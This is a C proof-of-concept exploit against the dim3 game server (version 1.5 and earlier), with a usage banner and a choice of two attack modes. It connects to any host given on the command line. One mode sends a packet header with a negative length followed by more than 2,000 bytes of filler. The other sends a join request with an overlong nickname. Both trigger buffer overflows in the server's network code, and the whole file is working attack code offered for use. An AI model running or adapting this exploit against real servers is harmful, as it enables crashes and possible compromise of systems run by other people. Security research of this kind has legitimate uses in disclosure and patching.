/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    11800
#define BOF1SZ  (net_max_msg_size + 64)
#define BOF2SZ  (name_str_len     + 64)

#define net_max_msg_size                            2048
#define name_str_len                                32

#define net_action_none                             0
#define net_action_request_info                     1
#define net_action_reply_info                       2
#define net_action_request_join                     3
#define net_action_reply_join                       4
#define net_action_request_leave                    5
#define net_action_request_remote_add               6
#define net_action_request_remote_remove            7
#define net_action_request_remote_update            8
#define net_action_request_message                  9
#define net_action_request_kill                     10
#define net_action_request_projectile_add           11
#define net_action_request_hitscan_add              12
#define net_action_request_melee_add                13

#pragma pack(2)
typedef struct {
    short   len;
    short   action;
    short   from_remote_uid;
} network_header;

//typedef struct {
//    char    *name;      // was name[name_str_len];
//} network_request_join;



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    network_header          nh;
    int     sd,
            attack;
    u_short port = PORT;
    u_char  *buff;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "dim3 <= 1.5 buffer-overflow bugs "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attack:\n"
            " 1 = network_receive_packet/data buffer-overflow\n"
            " 2 = network_host_handle_join buffer-overflow\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- connect...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf(" ok\n");

    buff = malloc(0xffff);
    if(!buff) std_err();

    if(attack == 2) {
        nh.len             = htons(BOF2SZ);
        nh.action          = htons(net_action_request_join);
        nh.from_remote_uid = htons(0);
        if(send(sd, (u_char *)&nh, sizeof(nh), 0)
          < 0) std_err();

        printf("- send long nickname\n");
        memset(buff, 'a', BOF2SZ);       // < net_max_msg_size
        buff[BOF2SZ - 1] = 0;
        if(send(sd, buff, BOF2SZ, 0)
          < 0) std_err();

    } else {

        printf("- send malformed header (negative size)\n");
        nh.len             = htons(-1);
        nh.action          = htons(net_action_none);
        nh.from_remote_uid = htons(0);
        if(send(sd, (u_char *)&nh, sizeof(nh), 0)
          < 0) std_err();

        printf("- send lot of data (%d bytes)\n", BOF1SZ);
        memset(buff, 'a', BOF1SZ);
        if(send(sd, buff, BOF1SZ, 0)
          < 0) std_err();

        printf("- close connection for forcing the return from the function\n");
    }

    close(sd);
    printf("- finished, check it manually\n");
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


